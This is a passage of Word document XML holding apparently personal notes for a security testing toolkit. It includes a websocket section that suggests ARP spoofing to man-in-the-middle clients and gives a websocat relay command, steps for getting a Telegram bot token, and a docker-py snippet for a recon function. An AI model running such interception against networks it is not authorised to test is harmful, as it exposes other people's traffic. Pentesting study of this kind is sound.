      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ws.recv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00625BEE" w:rsidRDefault="003B774A" w:rsidP="003B774A">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1998"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>print(result)</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B774A" w:rsidRDefault="003B774A" w:rsidP="003B774A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1998"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B774A" w:rsidRPr="00625BEE" w:rsidRDefault="003B774A" w:rsidP="003B774A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1998"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00625BEE" w:rsidRDefault="00625BEE" w:rsidP="00625BEE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00625BEE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">MitM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00625BEE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>websocket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00625BEE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> connections</w:t>
      </w:r>
      <w:r w:rsidRPr="00625BEE">
        <w:t xml:space="preserve">: If you find that clients are connected to a HTTP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00625BEE">
        <w:t>websocket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00625BEE">
        <w:t xml:space="preserve"> from your current local network, you could try an ARP Spoofing Attack to </w:t>
      </w:r>
      <w:r w:rsidRPr="00625BEE">
        <w:lastRenderedPageBreak/>
        <w:t>perform a MitM attack between the client and the server. Once the client is trying to connect to you can then use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00625BEE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>websocat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00625BEE">
        <w:t> to connect to the WebSocket server. Here is an example of how to test for this vulnerability using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00625BEE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>websocat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00625BEE">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B774A" w:rsidRPr="00625BEE" w:rsidRDefault="003B774A" w:rsidP="003B774A"/>
    <w:p w:rsidR="003B774A" w:rsidRDefault="003B774A" w:rsidP="003B774A">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B774A">
        <w:t>websocat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B774A">
        <w:t xml:space="preserve"> -E --insecure --text ws-listen:0.0.0.0:8000 wss://10.10.10.10:8000 -v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B774A" w:rsidRPr="00625BEE" w:rsidRDefault="003B774A" w:rsidP="00625BEE"/>
    <w:p w:rsidR="00625BEE" w:rsidRPr="00625BEE" w:rsidRDefault="00625BEE" w:rsidP="00625BEE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00625BEE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Websockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00625BEE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> enumeration</w:t>
      </w:r>
      <w:r w:rsidRPr="00625BEE">
        <w:t>: You can use the tool </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00625BEE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>STEWS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00625BEE">
        <w:t xml:space="preserve"> to discover, fingerprint and search for known vulnerabilities in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00625BEE">
        <w:t>websockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00625BEE">
        <w:t xml:space="preserve"> automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00625BEE" w:rsidRPr="00625BEE" w:rsidRDefault="00625BEE" w:rsidP="00625BEE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00625BEE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Websocket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00625BEE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Debug tools</w:t>
      </w:r>
      <w:r w:rsidRPr="00625BEE">
        <w:t xml:space="preserve">: Burp Suite supports MitM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00625BEE">
        <w:t>websockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00625BEE">
        <w:t xml:space="preserve"> communication in a very similar way it does it for regular HTTP communication.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00625BEE" w:rsidRDefault="00625BEE" w:rsidP="006F5C48"/>
    <w:p w:rsidR="006F5C48" w:rsidRPr="006F5C48" w:rsidRDefault="00A02D7E" w:rsidP="006F5C48">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1036" alt="" style="width:468pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00901FA2" w:rsidRDefault="00901FA2" w:rsidP="006373E4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc166500835"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BBA_configuration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006F5C48" w:rsidRDefault="006F5C48" w:rsidP="006F5C48"/>
    <w:p w:rsidR="006F5C48" w:rsidRDefault="006F5C48" w:rsidP="006F5C48"/>
    <w:p w:rsidR="006F5C48" w:rsidRDefault="006F5C48" w:rsidP="006F5C48"/>
    <w:p w:rsidR="006F5C48" w:rsidRPr="006F5C48" w:rsidRDefault="00A02D7E" w:rsidP="006F5C48">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1035" alt="" style="width:468pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00901FA2" w:rsidRDefault="00901FA2" w:rsidP="006373E4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc166500836"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BBA_ErrorH</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006F5C48" w:rsidRDefault="006F5C48" w:rsidP="006F5C48"/>
    <w:p w:rsidR="006F5C48" w:rsidRDefault="006F5C48" w:rsidP="006F5C48"/>
    <w:p w:rsidR="006F5C48" w:rsidRDefault="006F5C48" w:rsidP="006F5C48"/>
    <w:p w:rsidR="006F5C48" w:rsidRPr="006F5C48" w:rsidRDefault="00A02D7E" w:rsidP="006F5C48">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1034" alt="" style="width:468pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00901FA2" w:rsidRDefault="00901FA2" w:rsidP="006373E4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc166500837"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BBA_identify</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006F5C48" w:rsidRDefault="006F5C48" w:rsidP="006F5C48"/>
    <w:p w:rsidR="006F5C48" w:rsidRDefault="006F5C48" w:rsidP="006F5C48"/>
    <w:p w:rsidR="006F5C48" w:rsidRDefault="006F5C48" w:rsidP="006F5C48"/>
    <w:p w:rsidR="006F5C48" w:rsidRPr="006F5C48" w:rsidRDefault="00A02D7E" w:rsidP="006F5C48">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1033" alt="" style="width:468pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00901FA2" w:rsidRDefault="00901FA2" w:rsidP="006373E4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc166500838"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BBA_inputV</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006F5C48" w:rsidRDefault="006F5C48" w:rsidP="006F5C48"/>
    <w:p w:rsidR="006F5C48" w:rsidRDefault="006F5C48" w:rsidP="006F5C48"/>
    <w:p w:rsidR="006F5C48" w:rsidRDefault="006F5C48" w:rsidP="006F5C48"/>
    <w:p w:rsidR="006F5C48" w:rsidRPr="006F5C48" w:rsidRDefault="00A02D7E" w:rsidP="006F5C48">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1032" alt="" style="width:468pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00901FA2" w:rsidRDefault="00901FA2" w:rsidP="006373E4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc166500839"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BBA_Report</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006F5C48" w:rsidRDefault="006F5C48" w:rsidP="006F5C48"/>
    <w:p w:rsidR="006F5C48" w:rsidRDefault="006F5C48" w:rsidP="006F5C48"/>
    <w:p w:rsidR="006F5C48" w:rsidRPr="006F5C48" w:rsidRDefault="00A02D7E" w:rsidP="006F5C48">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1031" alt="" style="width:468pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00901FA2" w:rsidRDefault="00901FA2" w:rsidP="006373E4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc166500840"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BBA_session</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006F5C48" w:rsidRDefault="006F5C48" w:rsidP="006F5C48"/>
    <w:p w:rsidR="006F5C48" w:rsidRDefault="006F5C48" w:rsidP="006F5C48"/>
    <w:p w:rsidR="001E1B02" w:rsidRDefault="001E1B02" w:rsidP="006F5C48"/>
    <w:p w:rsidR="001E1B02" w:rsidRDefault="00A02D7E" w:rsidP="006F5C48">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1030" alt="" style="width:468pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F5C48" w:rsidRDefault="001E1B02" w:rsidP="006F5C48">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BBA_TeleBot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="001E1B02" w:rsidRDefault="001E1B02" w:rsidP="006F5C48"/>
    <w:p w:rsidR="001E1B02" w:rsidRPr="001E1B02" w:rsidRDefault="001E1B02" w:rsidP="001E1B02">
      <w:r w:rsidRPr="001E1B02">
        <w:t>Here are the steps to get your token:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E1B02" w:rsidRPr="001E1B02" w:rsidRDefault="001E1B02" w:rsidP="001E1B02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1B02">
        <w:t>Open the Telegram app and search for the "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E1B02">
        <w:t>BotFather</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E1B02">
        <w:t>" bot.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E1B02" w:rsidRPr="001E1B02" w:rsidRDefault="001E1B02" w:rsidP="001E1B02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1B02">
        <w:t xml:space="preserve">Start a chat with the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E1B02">
        <w:t>BotFather</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E1B02">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E1B02" w:rsidRPr="001E1B02" w:rsidRDefault="001E1B02" w:rsidP="001E1B02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1B02">
        <w:t>Send the command </w:t>
      </w:r>
      <w:r w:rsidRPr="001E1B02">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E1B02">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>newbot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E1B02">
        <w:t> to create a new bot.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E1B02" w:rsidRPr="001E1B02" w:rsidRDefault="001E1B02" w:rsidP="001E1B02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1B02">
        <w:t>Follow the instructions to set a name and username for your bot.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E1B02" w:rsidRPr="001E1B02" w:rsidRDefault="001E1B02" w:rsidP="001E1B02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1B02">
        <w:t xml:space="preserve">Once the bot is created, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E1B02">
        <w:t>BotFather</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E1B02">
        <w:t xml:space="preserve"> will send you the bot token. This token is required to authorize your bot.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E1B02" w:rsidRDefault="001E1B02" w:rsidP="006F5C48"/>
    <w:p w:rsidR="00A21AE8" w:rsidRDefault="00A21AE8" w:rsidP="006F5C48">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BBa_EL_bot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00D8332B" w:rsidRDefault="00D8332B" w:rsidP="006F5C48"/>
    <w:p w:rsidR="001E1B02" w:rsidRDefault="001E1B02" w:rsidP="006F5C48"/>
    <w:p w:rsidR="001E1B02" w:rsidRDefault="001E1B02" w:rsidP="006F5C48"/>
    <w:p w:rsidR="001E1B02" w:rsidRDefault="001E1B02" w:rsidP="006F5C48"/>
    <w:p w:rsidR="006F5C48" w:rsidRPr="006F5C48" w:rsidRDefault="00A02D7E" w:rsidP="006F5C48">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1029" alt="" style="width:468pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00901FA2" w:rsidRDefault="00901FA2" w:rsidP="006373E4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc166500841"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BBA_Test</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006F5C48" w:rsidRDefault="006F5C48" w:rsidP="006F5C48"/>
    <w:p w:rsidR="006F5C48" w:rsidRDefault="006F5C48" w:rsidP="006F5C48"/>
    <w:p w:rsidR="006F5C48" w:rsidRDefault="006F5C48" w:rsidP="006F5C48"/>
    <w:p w:rsidR="006F5C48" w:rsidRPr="006F5C48" w:rsidRDefault="00A02D7E" w:rsidP="006F5C48">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1028" alt="" style="width:468pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00901FA2" w:rsidRDefault="00901FA2" w:rsidP="006373E4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc166500842"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BBA_Weak</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006373E4" w:rsidRDefault="006373E4" w:rsidP="00901FA2"/>
    <w:p w:rsidR="006373E4" w:rsidRDefault="006373E4" w:rsidP="00901FA2"/>
    <w:p w:rsidR="006373E4" w:rsidRDefault="006373E4" w:rsidP="00901FA2"/>
    <w:p w:rsidR="008A4F8B" w:rsidRDefault="00A02D7E" w:rsidP="008A4F8B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1027" alt="" style="width:468pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4F8B" w:rsidRDefault="008A4F8B" w:rsidP="008A4F8B"/>
    <w:p w:rsidR="008A4F8B" w:rsidRPr="008A4F8B" w:rsidRDefault="00FB1B39" w:rsidP="008A4F8B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc166500843"/>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="008A4F8B" w:rsidRPr="008A4F8B">
        <w:t>Define docker image costume</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w:rsidR="00EB42C3" w:rsidRDefault="00EB42C3" w:rsidP="008A4F8B"/>
    <w:p w:rsidR="008A4F8B" w:rsidRPr="008A4F8B" w:rsidRDefault="008A4F8B" w:rsidP="008A4F8B">
      <w:r w:rsidRPr="008A4F8B">
        <w:t>Based on the sources provided, you can use the docker-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008A4F8B">
        <w:t>py</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008A4F8B">
        <w:t> library (also known as docker in Python) to interact with Docker and run a Docker image from your Python script </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="008A4F8B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>stackoverflow.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008A4F8B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4F8B" w:rsidRPr="008A4F8B" w:rsidRDefault="008A4F8B" w:rsidP="008A4F8B">
      <w:r w:rsidRPr="008A4F8B">
        <w:t>First, you need to install the docker Python library. You can do this using pip:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4F8B" w:rsidRPr="008A4F8B" w:rsidRDefault="008A4F8B" w:rsidP="008A4F8B">
      <w:r w:rsidRPr="008A4F8B">
        <w:t>pip install docker</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4F8B" w:rsidRPr="008A4F8B" w:rsidRDefault="008A4F8B" w:rsidP="008A4F8B">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A4F8B">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="008A4F8B">
        <w:instrText>HYPERLINK "" \t "_blank"</w:instrText>
      </w:r>
      <w:r w:rsidRPr="008A4F8B">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4F8B" w:rsidRPr="008A4F8B" w:rsidRDefault="008A4F8B" w:rsidP="008A4F8B">
      <w:r w:rsidRPr="008A4F8B">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4F8B" w:rsidRPr="008A4F8B" w:rsidRDefault="008A4F8B" w:rsidP="008A4F8B">
      <w:r w:rsidRPr="008A4F8B">
        <w:t>Then, you can modify the Recon function in the script to run a Docker image. Here's an example of how you might do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4F8B" w:rsidRPr="008A4F8B" w:rsidRDefault="008A4F8B" w:rsidP="008A4F8B">
      <w:r w:rsidRPr="008A4F8B">
        <w:t>import docker</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4F8B" w:rsidRPr="008A4F8B" w:rsidRDefault="008A4F8B" w:rsidP="008A4F8B"/>
    <w:p w:rsidR="008A4F8B" w:rsidRPr="008A4F8B" w:rsidRDefault="008A4F8B" w:rsidP="008A4F8B">
      <w:r w:rsidRPr="008A4F8B">
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008A4F8B">
        <w:t>Recon(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008A4F8B">
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4F8B" w:rsidRPr="008A4F8B" w:rsidRDefault="008A4F8B" w:rsidP="008A4F8B">
      <w:r w:rsidRPr="008A4F8B">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008A4F8B">
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008A4F8B">
        <w:t>"Recon process started...")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4F8B" w:rsidRPr="008A4F8B" w:rsidRDefault="008A4F8B" w:rsidP="008A4F8B">
      <w:r w:rsidRPr="008A4F8B">
        <w:t xml:space="preserve">    client = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008A4F8B">
        <w:t>docker.from</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008A4F8B">
        <w:t>_env</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008A4F8B">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4F8B" w:rsidRPr="008A4F8B" w:rsidRDefault="008A4F8B" w:rsidP="008A4F8B"/>
    <w:p w:rsidR="008A4F8B" w:rsidRPr="008A4F8B" w:rsidRDefault="008A4F8B" w:rsidP="008A4F8B">
      <w:r w:rsidRPr="008A4F8B">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    # Replace '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008A4F8B">
        <w:t>my_image</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008A4F8B">
        <w:t>' with the name of your Docker image</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4F8B" w:rsidRPr="008A4F8B" w:rsidRDefault="008A4F8B" w:rsidP="008A4F8B">
      <w:r w:rsidRPr="008A4F8B">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008A4F8B">
        <w:t>client.containers.run</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008A4F8B">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008A4F8B">
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008A4F8B">
        <w:t>my_image</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008A4F8B">
        <w:t>', detach=True)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4F8B" w:rsidRPr="008A4F8B" w:rsidRDefault="008A4F8B" w:rsidP="008A4F8B">
      <w:r w:rsidRPr="008A4F8B">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008A4F8B">
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008A4F8B">
        <w:t>"Docker container started.")</w:t>
      </w:r>
    </w:p>
